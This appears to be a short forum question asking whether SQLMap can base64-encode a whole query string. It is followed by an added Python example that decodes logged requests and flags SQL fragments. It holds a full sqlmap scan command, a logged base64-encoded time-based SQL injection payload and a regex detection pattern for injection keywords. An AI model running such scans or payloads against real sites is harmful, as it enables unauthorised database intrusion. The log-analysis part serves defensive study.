Using SQLMap to test SQL injection:
python sqlmap.py -v 2 --url='http://test.com/process.php?pre_email=tess@test.com&pinfos=2.95|3|29.95|30|38bbca71c4353610510db4eda8cc5bb3' --user-agent=SQLMAP --delay=1 --tamper=tamper/base64encode.py --timeout=15 --retries=2 --keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST -s output/scan_report.txt --flush-session -t output/scan_trace.txt --fresh-queries > output/scan_out.txt
I am getting this request:
[01/Nov/2013:17:16:20 -0400] "GET /process.php?pre_email=ZG9ubGltODJAaG90bWFpbC5jb20nIEFORCAzMTI4PUJFTkNITUFSSyg1MDAwMDAwLE1ENSgweDRkNDY2ZjQ5KSkgQU5EICdsbXdDJyBMSUtFICdsbXdD&pinfos=2.95%7C3%7C29.95%7C30%7C38bbca71c4353610510db4eda8cc5bb3
What I want is:
[01/Nov/2013:17:16:20 -0400] "GET /process.php?cHJlX2VtYWlsPXRlc3NAdGVzdC5jb20mcGluZm9zPTIuOTV8M3wyOS45NXwzMHwzOGJiY2E3MWM0MzUzNjEwNTEwZGI0ZWHhOGNjNWJiMw==
Can sqlmap base64-encode the full query string before sending it? The base64 tamper script only encodes the payload, which is a single variable, not the full query string.
THX
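
For reading the two kinds of access-log entry shown in the question from the server side, here is an added example (not part of the original post) that decodes a logged request target under either layout: base64 applied to individual parameter values, or to the entire query string. The function names, the SQL hint pattern and the sample targets are constructed for illustration, and the base64 detection is a heuristic.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qsl, unquote, quote

# Heuristic hint for SQL fragments in a decoded value (assumption, not exhaustive).
SQLI_HINT = re.compile(r"'\s*(?:AND|OR|UNION)\b|BENCHMARK\s*\(|SLEEP\s*\(", re.I)

def b64_text(value):
    """Return decoded text if value is strict base64 of printable text, else None."""
    candidate = value.replace(" ", "+")  # parse_qsl turns a raw '+' into a space
    if len(candidate) < 8 or len(candidate) % 4:
        return None
    try:
        text = base64.b64decode(candidate, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def decode_request(target):
    """Classify a logged request target and return (layout, decoded params)."""
    query = urlsplit(target).query
    whole = b64_text(unquote(query))
    if whole is not None and "=" in whole:
        # The entire query string was sent as one base64 blob.
        return "whole-query", dict(parse_qsl(whole, keep_blank_values=True))
    params = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        # Only individual parameter values may be encoded; others stay as logged.
        decoded = b64_text(value)
        params[name] = decoded if decoded is not None else value
    return "per-parameter", params

def flag_sqli(params):
    """Names of parameters whose decoded value matches the SQL hint pattern."""
    return sorted(n for n, v in params.items() if SQLI_HINT.search(v))

# Constructed sample request targets (not taken from a real log).
SAMPLE_VALUE = "tess@test.com' AND 'a' LIKE 'a"
PER_PARAM = ("/process.php?pre_email="
             + quote(base64.b64encode(SAMPLE_VALUE.encode()).decode())
             + "&pinfos=2.95%7C3")
WHOLE = "/process.php?" + base64.b64encode(b"pre_email=tess@test.com&pinfos=2.95|3").decode()

if __name__ == "__main__":
    for target in (PER_PARAM, WHOLE):
        layout, params = decode_request(target)
        print(layout, params, flag_sqli(params))
```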